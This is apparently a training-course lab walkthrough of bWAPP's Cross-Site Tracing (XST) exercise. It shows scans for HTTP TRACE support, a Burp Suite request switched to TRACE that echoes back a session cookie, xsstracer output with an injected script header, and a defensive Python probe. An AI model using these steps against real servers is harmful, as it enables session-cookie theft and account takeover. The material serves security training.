Information Security (legacy) / bWAPP   2019. 2. 16. 13:12

Web Hacking bWAPP - 66. A5 - Security Misconfiguration - Cross-Site Tracing (XST)

This material is put together for hands-on practice as part of a training course. Be advised that if it is used for personal or malicious purposes, the legal responsibility lies with you.

1. Security Misconfiguration

 - Insecure or incorrect security configuration.
 - Vulnerabilities caused by configuration errors in servers, systems, databases, network devices, or the web application itself.
 - Ex) directory listing, error pages, web page comments, default web server settings, Adobe Flash vulnerabilities, DoS/DDoS attacks,
       Reverse_TCP attacks against specific services, local privilege vulnerabilities, backup/temporary/robots files

2. HTTP TRACE method

 - A diagnostic method that asks the web server to return a copy of the request message it received.
 - It is normally used for testing, but because the returned copy also contains the user's Cookie header, it is what XST attacks rely on.

3. XST (Cross-Site Tracing)

 - When the HttpOnly flag is set on a cookie, script in the page cannot read it, which defends against cookie theft through XSS.
 - However, if the server accepts the TRACE method, HttpOnly can be bypassed: the browser attaches the Cookie header to the TRACE request as usual, and the server echoes that header back in the response body, where the cookie value can be read.

4. Security Misconfiguration - Cross-Site Tracing (XST)

 - In this scenario, the TRACE method is used to obtain the cookie information sent with a user's request.

Ex1) Understanding Security Misconfiguration - Cross-Site Tracing (XST)

Select the security level and the scenario

Note the scenario's statement: even when the HttpOnly flag is set, cookie information can still be obtained through the HTTP TRACE method

Scan for TRACE method support using nmap

root@kali:~# nmap 192.168.20.205 --script http-methods --script-args http-method.test-all='/192.168.20.205'

Starting Nmap 7.60 ( https://nmap.org ) at 2019-03-03 15:26 KST
Nmap scan report for www.bwapphttpslow.com (192.168.20.205)
Host is up (0.000048s latency).
Not shown: 984 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
| http-methods:
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
139/tcp  open  netbios-ssn
443/tcp  open  https
| http-methods:
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
666/tcp  open  doom
3306/tcp open  mysql
5901/tcp open  vnc-1
6001/tcp open  X11:1
8080/tcp open  http-proxy
| http-methods:
|_  Supported Methods: GET HEAD
8443/tcp open  https-alt
| http-methods:
|_  Supported Methods: GET HEAD
9080/tcp open  glrpc
MAC Address: 00:0C:29:5B:24:81 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
root@kali:~#

Scan for TRACE method support using nikto

root@kali:~# nikto -h 192.168.20.205
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.20.205
+ Target Hostname:    192.168.20.205
+ Target Port:        80
+ Start Time:         2019-03-03 15:24:30 (GMT9)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
~ output omitted ~
+ mod_ssl/2.2.8 OpenSSL/0.9.8g - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE

~ output omitted ~
root@kali:~#

Check for TRACE method support using curl (OPTIONS request)

root@kali:~# curl -v -X OPTIONS 192.168.20.205

* Rebuilt URL to: 192.168.20.205/
*   Trying 192.168.20.205...
* TCP_NODELAY set
* Connected to 192.168.20.205 (192.168.20.205) port 80 (#0)
> OPTIONS / HTTP/1.1
> Host: 192.168.20.205
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 03 Mar 2019 06:27:41 GMT
< Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
< Allow: GET,HEAD,POST,OPTIONS,TRACE
< Content-Length: 0
< Content-Type: text/html
< X-Pad: avoid browser bug
<
* Connection #0 to host 192.168.20.205 left intact

Scan for TRACE method support using Metasploit

root@kali:~# msfconsole -q
msf > use auxiliary/scanner/http/options


msf auxiliary(scanner/http/options) > set rhosts 192.168.20.205
rhosts => 192.168.20.205


msf auxiliary(scanner/http/options) > set rport 80
rport => 80


msf auxiliary(scanner/http/options) > exploit

[+] 192.168.20.205 allows GET,HEAD,POST,OPTIONS,TRACE methods
[+] 192.168.20.205:80 - TRACE method allowed.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(scanner/http/options) >
msf auxiliary(scanner/http/options) > use auxiliary/scanner/http/trace
msf auxiliary(scanner/http/trace) >
msf auxiliary(scanner/http/trace) > set rhosts 192.168.20.205
rhosts => 192.168.20.205


msf auxiliary(scanner/http/trace) > set rport 80
rport => 80


msf auxiliary(scanner/http/trace) > exploit

[+] 192.168.20.205:80 is vulnerable to Cross-Site Tracing
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/trace) >
msf auxiliary(scanner/http/trace) > quit


root@kali:~#
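The scans above (nmap, nikto, curl and the two Metasploit modules) all answer the same two questions about a host: does OPTIONS advertise TRACE in its Allow header, and does a TRACE request actually come back as message/http with the request headers echoed, which is the echo described in sections 2 and 3 and the reason the Cookie header ends up in the response. The script below is an added example, not part of the bWAPP lesson or of any of those tools: it implements that check with Python's standard library and, so that it runs offline, stands up two small loopback servers, one that echoes TRACE the way the Apache 2.2.8 on the page does and one with TRACE disabled. The handler classes, the X-Xst-Probe marker header and its value are all constructed for this example.

```python
"""Added example (not bWAPP's code): a TRACE / XST pre-check.

Two local handlers simulate the two server states so the probe runs
offline: TraceEnabledHandler echoes TRACE like a misconfigured Apache,
TraceDisabledHandler rejects it like Apache with `TraceEnable off`.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed marker: a header value the target cannot know in advance, so
# seeing it in the response body proves the request was echoed.
PROBE_HEADER = "X-Xst-Probe"
PROBE_VALUE = "xst-probe-4f2a"


class _BaseHandler(BaseHTTPRequestHandler):
    protocol_version = "HTTP/1.1"
    ALLOW = "GET,HEAD,POST,OPTIONS"          # what OPTIONS advertises

    def log_message(self, *args):            # keep the server quiet
        pass

    def do_OPTIONS(self):
        self.send_response(200)
        self.send_header("Allow", self.ALLOW)
        self.send_header("Content-Length", "0")
        self.end_headers()


class TraceEnabledHandler(_BaseHandler):
    """Misconfigured server: TRACE echoes request line + headers back."""
    ALLOW = "GET,HEAD,POST,OPTIONS,TRACE"

    def do_TRACE(self):
        echo = (self.requestline + "\r\n" + str(self.headers)).encode("latin-1")
        self.send_response(200)
        self.send_header("Content-Type", "message/http")
        self.send_header("Content-Length", str(len(echo)))
        self.end_headers()
        self.wfile.write(echo)


class TraceDisabledHandler(_BaseHandler):
    """Hardened server: no do_TRACE, so the stdlib answers 501 Not Implemented."""


def start_server(handler_cls):
    """Bind an ephemeral loopback port and serve from a daemon thread."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), handler_cls)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def _request(host, port, method, path="/", headers=None):
    """One request on a fresh connection; returns (status, headers, body)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request(method, path, headers=headers or {})
        resp = conn.getresponse()
        return resp.status, resp.getheaders(), resp.read().decode("latin-1")
    finally:
        conn.close()


def classify(allow_header, trace_status, trace_content_type, trace_body):
    """Pure decision logic, so it can also be run over captured responses."""
    allowed = [m.strip().upper() for m in (allow_header or "").split(",") if m.strip()]
    echoed = (trace_status == 200
              and (trace_content_type or "").lower().startswith("message/http")
              and PROBE_VALUE in trace_body)
    return {
        "allowed_methods": allowed,
        "trace_advertised": "TRACE" in allowed,
        "trace_status": trace_status,
        "trace_echoes_request": echoed,   # True => request (and Cookie) is echoed
    }


def probe_trace(host, port):
    """Send OPTIONS, then TRACE carrying the marker header, and classify."""
    _, opt_headers, _ = _request(host, port, "OPTIONS")
    allow = {k.lower(): v for k, v in opt_headers}.get("allow")
    status, tr_headers, body = _request(host, port, "TRACE",
                                        headers={PROBE_HEADER: PROBE_VALUE})
    ctype = {k.lower(): v for k, v in tr_headers}.get("content-type")
    return classify(allow, status, ctype, body)


if __name__ == "__main__":
    for name, handler in (("TRACE on ", TraceEnabledHandler),
                          ("TRACE off", TraceDisabledHandler)):
        srv = start_server(handler)
        try:
            print(name, probe_trace("127.0.0.1", srv.server_address[1]))
        finally:
            srv.shutdown()
            srv.server_close()
```

Only the second answer, the echo, is the real XST signal; an Allow header alone is a hint. The hardened handler corresponds to `TraceEnable off` in Apache httpd, after which OPTIONS stops advertising TRACE and the method is rejected, which is the state the scanners above report as clean. Current browsers refuse to send TRACE from page script (it is a forbidden method in the Fetch standard), so a proxy-driven request like the Burp Suite steps that follow is how the echo is observed today; disabling the method server-side remains the expected fix.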

In Burp Suite, change Intercept to 'Intercept is on'

Click refresh in the browser address bar

Check the intercepted request in Burp Suite

Change the GET method to TRACE

GET /bWAPP/sm_xst.php HTTP/1.1  <- original

TRACE /bWAPP/sm_xst.php HTTP/1.1  <- modified

Host: 192.168.20.205
User-Agent: Mozilla/5.0 (Linux; Android 7.0; PLUS Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.205/bWAPP/xss_stored_2.php
Cookie: PHPSESSID=4123975b1f94e0999503343be60a2595; security_level=0
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Confirm the method is now TRACE -> click the 'Forward' button

Click 'Intercept is on' to turn interception off

Confirm 'Intercept is off'

In the browser (bWAPP), select 'Save File' -> click the 'OK' button

Check the contents of the 'sm_xst.php' file -> confirm the cookie information

root@kali:~# cd Downloads/
root@kali:~/Downloads# ls -l sm_xst.php
-rw-r--r-- 1 root root 541  3월  3 15:46 sm_xst.php
root@kali:~/Downloads#
root@kali:~/Downloads# cat sm_xst.php
TRACE /bWAPP/sm_xst.php HTTP/1.1
Host: 192.168.20.205
User-Agent: Mozilla/5.0 (Linux; Android 7.0; PLUS Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.205/bWAPP/xss_stored_2.php
Cookie: PHPSESSID=4123975b1f94e0999503343be60a2595; security_level=0
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

root@kali:~/Downloads# cd
root@kali:~#

Testing for the XST vulnerability with 'xsstracer.py'

root@kali:~# wget https://raw.githubusercontent.com/1N3/XSSTracer/master/xsstracer.py


--2019-03-03 16:56:26--  https://raw.githubusercontent.com/1N3/XSSTracer/master/xsstracer.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.72.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.72.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4600 (4.5K) [text/plain]
Saving to: ‘xsstracer.py’

xsstracer.py        100%[===================>]   4.49K  --.-KB/s    in 0s     

2019-03-03 16:56:26 (16.2 MB/s) - ‘xsstracer.py’ saved [4600/4600]


root@kali:~# ls -l xsstracer.py
-rw-r--r-- 1 root root 4600  3월  3 16:56 xsstracer.py

root@kali:~# python xsstracer.py 192.168.20.205 80

 __  ______ _____
 \ \/ / ___|_   _|
  \  /\___ \ | | 
  /  \ ___) || | 
 /_/\_|____/ |_| 

+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
+ -- --=[Target: 192.168.20.205:80
+ -- --=[Site vulnerable to Cross-Site Tracing!
+ -- --=[Site vulnerable to Host Header Injection!
+ -- --=[Site vulnerable to Cross-Frame Scripting!
+ -- --=[Site vulnerable to Clickjacking!

HTTP/1.1 200 OK
Date: Sun, 03 Mar 2019 07:56:55 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Transfer-Encoding: chunked
Content-Type: message/http

4c
TRACE / HTTP/1.1
Test: <script>alert(1);</script>
Host: 192.168.20.205


0


HTTP/1.1 200 OK
Date: Sun, 03 Mar 2019 07:56:55 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Sun, 02 Nov 2014 18:20:24 GMT
ETag: "ccb16-24c-506e4489b4a00"
Accept-Ranges: bytes
Content-Length: 588
Content-Type: text/html

<!DOCTYPE html>
<html>

<body>

<h1>bWAPP, an extremely buggy web app !</h1>

 <table>

  <tr height="20">
  <td>
  <a href="bWAPP">bWAPP</a>
  </td>
  </tr>

  <tr height="20">
  <td>
  <a href="drupal">Drupageddon</a>
  </td>
  </tr>

  <tr height="20">
  <td>
  <a href="evil">Evil folder</a>
  </td>
  </tr>

  <tr height="20">
  <td>
  <a href="phpmyadmin">phpMyAdmin</a>
  </td>
  </tr>

  <tr height="20">
  <td>
  <a href="sqlite">SQLiteManager</a>
  </td>
  </tr>

  <tr height="200">
  <td>
  <img src="./bWAPP/images/evil_bee.png">
  </td>
  </tr>

 </table>

</body>

</html>

root@kali:~#

[YouTube] Video lecture link (Subscribe! Like!!!)

Web Hacking 66. A5 - bWAPP Security Misconfiguration - Cross-Site Tracing (XST)   https://youtu.be/CHTDubIkUHU

Posted by 김정우 (instructor, KakaoTalk: kim10322)